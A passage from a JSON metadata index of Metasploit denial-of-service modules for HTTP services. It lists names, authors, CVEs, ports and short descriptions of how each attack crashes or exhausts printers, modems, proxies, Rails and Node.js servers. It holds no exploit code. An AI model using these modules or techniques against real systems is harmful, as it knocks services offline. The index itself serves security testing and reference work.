"post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/brother_debut_dos": { - "name": "Brother Debut http Denial Of Service", - "fullname": "auxiliary/dos/http/brother_debut_dos", - "aliases": [], - 
"rank": 300, - "disclosure_date": "2017-11-02", - "type": "auxiliary", - "author": [ - "z00n <0xz00n@gmail.com>", - "h00die" - ], - "description": "The Debut embedded HTTP server <= 1.20 on Brother printers allows for a Denial\n of Service (DoS) condition via a crafted HTTP request. The printer will be\n unresponsive from HTTP and printing requests for ~300 seconds. After which, the\n printer will start responding again.", - "references": [ - "CVE-2017-16249", - "URL-https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18730" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/dos/http/brother_debut_dos.rb", - "is_install_path": true, - "ref_name": "dos/http/brother_debut_dos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/cable_haunt_websocket_dos": { - "name": "\"Cablehaunt\" Cable Modem WebSocket DoS", - "fullname": "auxiliary/dos/http/cable_haunt_websocket_dos", - "aliases": [], - "rank": 300, - "disclosure_date": "2020-01-07", - "type": "auxiliary", - "author": [ - "Alexander Dalsgaard Krog (Lyrebirds)", - "Jens Hegner Stærmose (Lyrebirds)", - "Kasper Kohsel Terndrup (Lyrebirds)", - "Simon Vandel Sillesen (Independent)", - "Nicholas Starke" - ], - "description": "There exists a buffer overflow vulnerability in certain\n Cable Modem Spectrum Analyzer interfaces. 
This overflow\n is exploitable, but since an exploit would differ between\n every make, model, and firmware version (which also\n differs from ISP to ISP), this module simply causes a\n Denial of Service to test if the vulnerability is present.", - "references": [ - "CVE-2019-19494", - "EDB-47936", - "URL-https://cablehaunt.com/", - "URL-https://github.com/Lyrebirds/sagemcom-fast-3890-exploit" - ], - "platform": "", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/auxiliary/dos/http/cable_haunt_websocket_dos.rb", - "is_install_path": true, - "ref_name": "dos/http/cable_haunt_websocket_dos", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/canon_wireless_printer": { - "name": "Canon Wireless Printer Denial Of Service", - "fullname": "auxiliary/dos/http/canon_wireless_printer", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-06-18", - "type": "auxiliary", - "author": [ - "Matt \"hostess\" Andreko " - ], - "description": "The HTTP management interface on several models of Canon Wireless printers\n allows for a Denial of Service (DoS) condition via a crafted HTTP request. 
Note:\n if this module is successful, the device can only be recovered with a physical\n power cycle.", - "references": [ - "CVE-2013-4615", - "URL-https://www.mattandreko.com/2013/06/canon-y-u-no-security.html" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/dos/http/canon_wireless_printer.rb", - "is_install_path": true, - "ref_name": "dos/http/canon_wireless_printer", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/dell_openmanage_post": { - "name": "Dell OpenManage POST Request Heap Overflow (win32)", - "fullname": "auxiliary/dos/http/dell_openmanage_post", - "aliases": [], - "rank": 300, - "disclosure_date": "2004-02-26", - "type": "auxiliary", - "author": [ - "aushack " - ], - "description": "This module exploits a heap overflow in the Dell OpenManage\n Web Server (omws32.exe), versions 3.2-3.7.1. 
The vulnerability\n exists due to a boundary error within the handling of POST requests,\n where the application input is set to an overly long file name.\n This module will crash the web server, however it is likely exploitable\n under certain conditions.", - "references": [ - "URL-http://archives.neohapsis.com/archives/bugtraq/2004-02/0650.html", - "BID-9750", - "OSVDB-4077", - "CVE-2004-0331" - ], - "platform": "", - "arch": "", - "rport": 1311, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/http/dell_openmanage_post.rb", - "is_install_path": true, - "ref_name": "dos/http/dell_openmanage_post", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/f5_bigip_apm_max_sessions": { - "name": "F5 BigIP Access Policy Manager Session Exhaustion Denial of Service", - "fullname": "auxiliary/dos/http/f5_bigip_apm_max_sessions", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Denis Kolegov ", - "Oleg Broslavsky ", - "Nikita Oleksov " - ], - "description": "This module exploits a resource exhaustion denial of service in F5 BigIP devices. An\n unauthenticated attacker can establish multiple connections with BigIP Access Policy\n Manager (APM) and exhaust all available sessions defined in customer license. In the\n first step of the BigIP APM negotiation the client sends a HTTP request. The BigIP\n system creates a session, marks it as pending and then redirects the client to an access\n policy URI. 
Since BigIP allocates a new session after the first unauthenticated request,\n and deletes the session only if an access policy timeout expires, the attacker can exhaust\n all available sessions by repeatedly sending the initial HTTP request and leaving the\n sessions as pending.", - "references": [ - "URL-https://support.f5.com/kb/en-us/products/big-ip_apm/releasenotes/product/relnote-apm-11-6-0.html" - ], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb", - "is_install_path": true, - "ref_name": "dos/http/f5_bigip_apm_max_sessions", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/flexense_http_server_dos": { - "name": "Flexense HTTP Server Denial Of Service", - "fullname": "auxiliary/dos/http/flexense_http_server_dos", - "aliases": [], - "rank": 300, - "disclosure_date": "2018-03-09", - "type": "auxiliary", - "author": [ - "Ege Balci " - ], - "description": "This module triggers a Denial of Service vulnerability in the Flexense HTTP server.\n Vulnerability caused by a user mode write access memory violation and can be triggered with\n rapidly sending variety of HTTP requests with long HTTP header values.\n\n Multiple Flexense applications that are using Flexense HTTP server 10.6.24 and below versions reportedly vulnerable.", - "references": [ - "CVE-2018-8065", - "URL-https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": 
"/modules/auxiliary/dos/http/flexense_http_server_dos.rb", - "is_install_path": true, - "ref_name": "dos/http/flexense_http_server_dos", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/gzip_bomb_dos": { - "name": "Gzip Memory Bomb Denial Of Service", - "fullname": "auxiliary/dos/http/gzip_bomb_dos", - "aliases": [], - "rank": 300, - "disclosure_date": "2004-01-01", - "type": "auxiliary", - "author": [ - "info ", - "joev " - ], - "description": "This module generates and hosts a 10MB single-round gzip file that decompresses to 10GB.\n Many applications will not implement a length limit check and will eat up all memory and\n eventually die. This can also be used to kill systems that download/parse content from\n a user-provided URL (image-processing servers, AV, websites that accept zipped POST data, etc).\n\n A FILEPATH datastore option can also be provided to save the .gz bomb locally.\n\n Some clients (Firefox) will allow for multiple rounds of gzip. Most gzip utils will correctly\n deflate multiple rounds of gzip on a file. 
Setting ROUNDS=3 and SIZE=10240 (default value)\n will generate a 300 byte gzipped file that expands to 10GB.", - "references": [ - "URL-http://www.aerasec.de/security/advisories/decompression-bomb-vulnerability.html" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/http/gzip_bomb_dos.rb", - "is_install_path": true, - "ref_name": "dos/http/gzip_bomb_dos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "WebServer", - "description": "Host file via web server" - } - ] - }, - "auxiliary_dos/http/hashcollision_dos": { - "name": "Hashtable Collisions", - "fullname": "auxiliary/dos/http/hashcollision_dos", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-12-28", - "type": "auxiliary", - "author": [ - "Alexander Klink", - "Julian Waelde", - "Scott A. Crosby", - "Dan S. Wallach", - "Krzysztof Kotowicz", - "Christian Mehlmauer " - ], - "description": "This module uses a denial-of-service (DoS) condition appearing in a variety of\n programming languages. This vulnerability occurs when storing multiple values\n in a hash table and all values have the same hash value. 
This can cause a web server\n parsing the POST parameters issued with a request into a hash table to consume\n hours of CPU with a single HTTP request.\n\n Currently, only the hash functions for PHP and Java are implemented.\n This module was tested with PHP + httpd, Tomcat, Glassfish and Geronimo.\n It also generates a random payload to bypass some IDS signatures.", - "references": [ - "URL-http://ocert.org/advisories/ocert-2011-003.html", - "URL-https://web.archive.org/web/20120105151644/http://www.nruns.com/_downloads/advisory28122011.pdf", - "URL-https://fahrplan.events.ccc.de/congress/2011/Fahrplan/events/4680.en.html", - "URL-https://fahrplan.events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf", - "URL-https://www.youtube.com/watch?v=R2Cq3CLI6H8", - "CVE-2011-5034", - "CVE-2011-5035", - "CVE-2011-4885", - "CVE-2011-4858" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/dos/http/hashcollision_dos.rb", - "is_install_path": true, - "ref_name": "dos/http/hashcollision_dos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/ibm_lotus_notes": { - "name": "IBM Notes encodeURI DOS", - "fullname": "auxiliary/dos/http/ibm_lotus_notes", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-08-31", - "type": "auxiliary", - "author": [ - "Dhiraj Mishra" - ], - "description": "This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes.\n If successful, it could cause the Notes client to hang and have to be restarted.", - "references": [ - "EDB-42602", - "CVE-2017-1129", - 
"URL-http://www-01.ibm.com/support/docview.wss?uid=swg21999385" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2023-03-22 12:52:15 +0000", - "path": "/modules/auxiliary/dos/http/ibm_lotus_notes.rb", - "is_install_path": true, - "ref_name": "dos/http/ibm_lotus_notes", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "WebServer", - "description": "Serve exploit via web server" - } - ] - }, - "auxiliary_dos/http/ibm_lotus_notes2": { - "name": "IBM Notes Denial Of Service", - "fullname": "auxiliary/dos/http/ibm_lotus_notes2", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-08-31", - "type": "auxiliary", - "author": [ - "Dhiraj Mishra" - ], - "description": "This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes.\n If successful, the browser will crash after viewing the webpage.", - "references": [ - "EDB-42604", - "CVE-2017-1130" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/http/ibm_lotus_notes2.rb", - "is_install_path": true, - "ref_name": "dos/http/ibm_lotus_notes2", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "WebServer", - "description": "Serve exploit via web server" - } - ] - }, - "auxiliary_dos/http/marked_redos": { - "name": "marked npm module \"heading\" ReDoS", - "fullname": "auxiliary/dos/http/marked_redos", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Adam Cazzolla, Sonatype Security Research", - "Nick Starke, Sonatype Security Research" - ], - "description": "This 
module exploits a Regular Expression Denial of Service vulnerability\n in the npm module \"marked\". The vulnerable portion of code that this module\n targets is in the \"heading\" regular expression. Web applications that use\n \"marked\" for generating html from markdown are vulnerable. Versions up to\n 0.4.0 are vulnerable.", - "references": [ - "URL-https://blog.sonatype.com/cve-2017-17461-vulnerable-or-not", - "CWE-400" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2018-08-16 14:59:32 +0000", - "path": "/modules/auxiliary/dos/http/marked_redos.rb", - "is_install_path": true, - "ref_name": "dos/http/marked_redos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/metasploit_httphandler_dos": { - "name": "Metasploit HTTP(S) handler DoS", - "fullname": "auxiliary/dos/http/metasploit_httphandler_dos", - "aliases": [], - "rank": 300, - "disclosure_date": "2019-09-04", - "type": "auxiliary", - "author": [ - "Jose Garduno, Dreamlab Technologies AG", - "Angelo Seiler, Dreamlab Technologies AG" - ], - "description": "This module exploits the Metasploit HTTP(S) handler by sending\n a specially crafted HTTP request that gets added as a resource handler.\n Resources (which come from the external connections) are evaluated as RegEx\n in the handler server. 
Specially crafted input can trigger Gentle, Soft and Hard DoS.\n\n Tested against Metasploit 5.0.20.", - "references": [ - "CVE-2019-5645" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2019-12-26 13:31:38 +0000", - "path": "/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb", - "is_install_path": true, - "ref_name": "dos/http/metasploit_httphandler_dos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/monkey_headers": { - "name": "Monkey HTTPD Header Parsing Denial of Service (DoS)", - "fullname": "auxiliary/dos/http/monkey_headers", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-05-30", - "type": "auxiliary", - "author": [ - "Doug Prostko " - ], - "description": "This module causes improper header parsing that leads to a segmentation fault\n due to a specially crafted HTTP request. 
Affects version <= 1.2.0.", - "references": [ - "CVE-2013-3843", - "OSVDB-93853", - "BID-60333" - ], - "platform": "", - "arch": "", - "rport": 2001, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/http/monkey_headers.rb", - "is_install_path": true, - "ref_name": "dos/http/monkey_headers", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/ms15_034_ulonglongadd": { - "name": "MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service", - "fullname": "auxiliary/dos/http/ms15_034_ulonglongadd", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Bill Finlayson", - "sinn3r " - ], - "description": "This module will check if scanned hosts are vulnerable to CVE-2015-1635 (MS15-034), a\n vulnerability in the HTTP protocol stack (HTTP.sys) that could result in arbitrary code\n execution. 
This module will try to cause a denial-of-service.", - "references": [ - "CVE-2015-1635", - "MSB-MS15-034", - "URL-https://pastebin.com/ypURDPc4", - "URL-https://github.com/rapid7/metasploit-framework/pull/5150", - "URL-https://community.qualys.com/blogs/securitylabs/2015/04/20/ms15-034-analyze-and-remote-detection", - "URL-http://www.securitysift.com/an-analysis-of-ms15-034/" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb", - "is_install_path": true, - "ref_name": "dos/http/ms15_034_ulonglongadd", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/nodejs_pipelining": { - "name": "Node.js HTTP Pipelining Denial of Service", - "fullname": "auxiliary/dos/http/nodejs_pipelining", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-10-18", - "type": "auxiliary", - "author": [ - "Marek Majkowski", - "titanous", - "joev " - ], - "description": "This module exploits a Denial of Service (DoS) condition in the HTTP parser of Node.js versions\n released before 0.10.21 and 0.8.26. 
The attack sends many pipelined\n HTTP requests on a single connection, which causes unbounded memory\n allocation when the client does not read the responses.", - "references": [ - "CVE-2013-4450", - "OSVDB-98724", - "BID-63229", - "URL-https://nodejs.org/ja/blog/vulnerability/http-server-pipeline-flood-dos/" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/dos/http/nodejs_pipelining.rb", - "is_install_path": true, - "ref_name": "dos/http/nodejs_pipelining", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/novell_file_reporter_heap_bof": { - "name": "NFR Agent Heap Overflow Vulnerability", - "fullname": "auxiliary/dos/http/novell_file_reporter_heap_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-11-16", - "type": "auxiliary", - "author": [ - "juan vazquez " - ], - "description": "This module exploits a heap overflow in NFRAgent.exe, a component of Novell\n File Reporter (NFR). 
The vulnerability occurs when handling requests of name \"SRS\",\n where NFRAgent.exe fails to generate a response in a secure way, copying user\n controlled data into a fixed-length buffer in the heap without bounds checking.\n This module has been tested against NFR Agent 1.0.4.3 (File Reporter 1.0.2).", - "references": [ - "CVE-2012-4956", - "URL-https://www.rapid7.com/blog/post/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959/" - ], - "platform": "", - "arch": "", - "rport": 3037, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb", - "is_install_path": true, - "ref_name": "dos/http/novell_file_reporter_heap_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/rails_action_view": { - "name": "Ruby on Rails Action View MIME Memory Exhaustion", - "fullname": "auxiliary/dos/http/rails_action_view", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-12-04", - "type": "auxiliary", - "author": [ - "Toby Hsieh", - "joev ", - "sinn3r " - ], - "description": "This module exploits a Denial of Service (DoS) condition in Action View that requires\n a controller action. 
By sending a specially crafted content-type header to a Rails\n application, it is possible for it to store the invalid MIME type, and may eventually\n consume all memory if enough invalid MIMEs are given.\n\n Versions 3.0.0 and other later versions are affected, fixed in 4.0.2 and 3.2.16.", - "references": [ - "CVE-2013-6414", - "OSVDB-100525", - "BID-64074", - "URL-https://seclists.org/oss-sec/2013/q4/400", - "URL-https://github.com/rails/rails/commit/bee3b7f9371d1e2ddcfe6eaff5dcb26c0a248068" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/http/rails_action_view.rb", - "is_install_path": true, - "ref_name": "dos/http/rails_action_view", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/rails_json_float_dos": { - "name": "Ruby on Rails JSON Processor Floating Point Heap Overflow DoS", - "fullname": "auxiliary/dos/http/rails_json_float_dos", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-11-22", - "type": "auxiliary", - "author": [ - "Charlie Somerville", - "joev ", - "todb " - ], - "description": "When Ruby attempts to convert a string representation of a large floating point\n decimal number to its floating point equivalent, a heap-based buffer overflow\n can be triggered. This module has been tested successfully on a Ruby on Rails application\n using Ruby version 1.9.3-p448 with WebRick and Thin web servers, where the Rails application\n crashes with a segfault error. 
Other versions of Ruby are reported to be affected.", - "references": [ - "CVE-2013-4164", - "OSVDB-100113", - "URL-https://www.ruby-lang.org/en/news/2013/11/22/ruby-1-9-3-p484-is-released/" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/http/rails_json_float_dos.rb", - "is_install_path": true, - "ref_name": "dos/http/rails_json_float_dos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/slowloris": { - "name": "Slowloris Denial of Service Attack", - "fullname": "auxiliary/dos/http/slowloris", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-06-17", - "type": "auxiliary", - "author": [ - "RSnake", - "Gokberk Yaltirakli", - "Daniel Teixeira", - "Matthew Kienow " - ], - "description": "Slowloris tries to keep many connections to the target web server open and hold them open as long as possible.\n It accomplishes this by opening connections to the target web server and sending a partial request.\n Periodically, it will send subsequent HTTP headers, adding to-but never completing-the request.\n Affected servers will keep these connections open, filling their maximum concurrent connection pool,\n eventually denying additional connection attempts from clients.", - "references": [ - "CVE-2007-6750", - "CVE-2010-2227", - "EDB-8976", - "URL-https://github.com/gkbrk/slowloris" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-01-29 00:51:56 +0000", - "path": "/modules/auxiliary/dos/http/slowloris.py", - "is_install_path": true, - "ref_name": "dos/http/slowloris", - "check": false, - "post_auth": 
false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/sonicwall_ssl_format": { - "name": "SonicWALL SSL-VPN Format String Vulnerability", - "fullname": "auxiliary/dos/http/sonicwall_ssl_format", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-05-29", - "type": "auxiliary", - "author": [ - "aushack " - ], - "description": "There is a format string vulnerability within the SonicWALL\n SSL-VPN Appliance - 200, 2000 and 4000 series. Arbitrary memory\n can be read or written to, depending on the format string used.\n There appears to be a length limit of 127 characters of format\n string data. With physical access to the device and debugging,\n this module may be able to be used to execute arbitrary code remotely.", - "references": [ - "BID-35145", - "OSVDB-54881", - "URL-http://www.aushack.com/200905-sonicwall.txt" - ], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/http/sonicwall_ssl_format.rb", - "is_install_path": true, - "ref_name": "dos/http/sonicwall_ssl_format", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/squid_range_dos": { - "name": "Squid Proxy Range Header DoS", - "fullname": "auxiliary/dos/http/squid_range_dos", - "aliases": [], - "rank": 300, - "disclosure_date": "2021-05-27", - "type": "auxiliary", - "author": [ - "Joshua Rogers" - ], - "description": "The range handler in The Squid Caching Proxy Server 3.0-4.1.4 and\n 5.0.1-5.0.5 suffers from multiple vulnerabilities triggered\n by specific HTTP requests and responses.\n\n These vulnerabilities allow remote attackers to cause 
a\n denial of service through specifically crafted requests.", - "references": [ - "CVE-2021-31806", - "CVE-2021-31807", - "URL-https://blogs.opera.com/security/2021/10/fuzzing-http-proxies-squid-part-2/" - ], - "platform": "", - "arch": "", - "rport": 3128, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2021-10-21 19:15:30 +0000", - "path": "/modules/auxiliary/dos/http/squid_range_dos.rb", - "is_install_path": true, - "ref_name": "dos/http/squid_range_dos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "Reliability": [], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "DOS", - "description": "Perform Denial of Service Against The Target" - } - ] - }, - "auxiliary_dos/http/tautulli_shutdown_exec": { - "name": "Tautulli v2.1.9 - Shutdown Denial of Service", - "fullname": "auxiliary/dos/http/tautulli_shutdown_exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Ismail Tasdelen" - ], - "description": "Tautulli versions 2.1.9 and prior are vulnerable to denial of service via the /shutdown URL.", - "references": [ - "CVE-2019-19833", - "EDB-47785" - ], - "platform": "", - "arch": "", - "rport": 8181, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2021-08-27 17:15:33 +0000", - "path": "/modules/auxiliary/dos/http/tautulli_shutdown_exec.rb", - "is_install_path": true, - "ref_name": "dos/http/tautulli_shutdown_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - 
"auxiliary_dos/http/ua_parser_js_redos": { - "name": "ua-parser-js npm module ReDoS", - "fullname": "auxiliary/dos/http/ua_parser_js_redos", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Ryan Knell, Sonatype Security Research", - "Nick Starke, Sonatype Security Research" - ], - "description": "This module exploits a Regular Expression Denial of Service vulnerability\n in the npm module \"ua-parser-js\". Server-side applications that use\n \"ua-parser-js\" for parsing the browser user-agent string will be vulnerable\n if they call the \"getOS\" or \"getResult\" functions. This vulnerability was\n fixed as of version 0.7.16.", - "references": [ - "CVE-2017-16086", - "URL-https://github.com/faisalman/ua-parser-js/commit/25e143ee7caba78c6405a57d1d06b19c1e8e2f79", - "CWE-400" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2018-07-12 17:34:52 +0000", - "path": "/modules/auxiliary/dos/http/ua_parser_js_redos.rb", - "is_install_path": true, - "ref_name": "dos/http/ua_parser_js_redos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/webkitplus": { - "name": "WebKitGTK+ WebKitFaviconDatabase DoS", - "fullname": "auxiliary/dos/http/webkitplus", - "aliases": [], - "rank": 300, - "disclosure_date": "2018-06-03", - "type": "auxiliary", - "author": [ - "Dhiraj Mishra", - "Hardik Mehta", - "Zubin Devnani", - "Manuel Caballero" - ], - "description": "This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset.\n If successful, it could lead to application crash, resulting in denial of service.", - "references": [ - "EDB-44842", - "CVE-2018-11646", - 
"URL-https://bugs.webkit.org/show_bug.cgi?id=186164", - "URL-https://www.inputzero.io/2018/06/cve-2018-11646-webkit.html" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/dos/http/webkitplus.rb", - "is_install_path": true, - "ref_name": "dos/http/webkitplus", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "WebServer", - "description": "Serve exploit via web server" - } - ] - }, - "auxiliary_dos/http/webrick_regex": { - "name": "Ruby WEBrick::HTTP::DefaultFileHandler DoS", - "fullname": "auxiliary/dos/http/webrick_regex", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-08-08", - "type": "auxiliary", - "author": [ - "kris katterjohn " - ], - "description": "The WEBrick::HTTP::DefaultFileHandler in WEBrick in\n Ruby 1.8.5 and earlier, 1.8.6 to 1.8.6-p286, 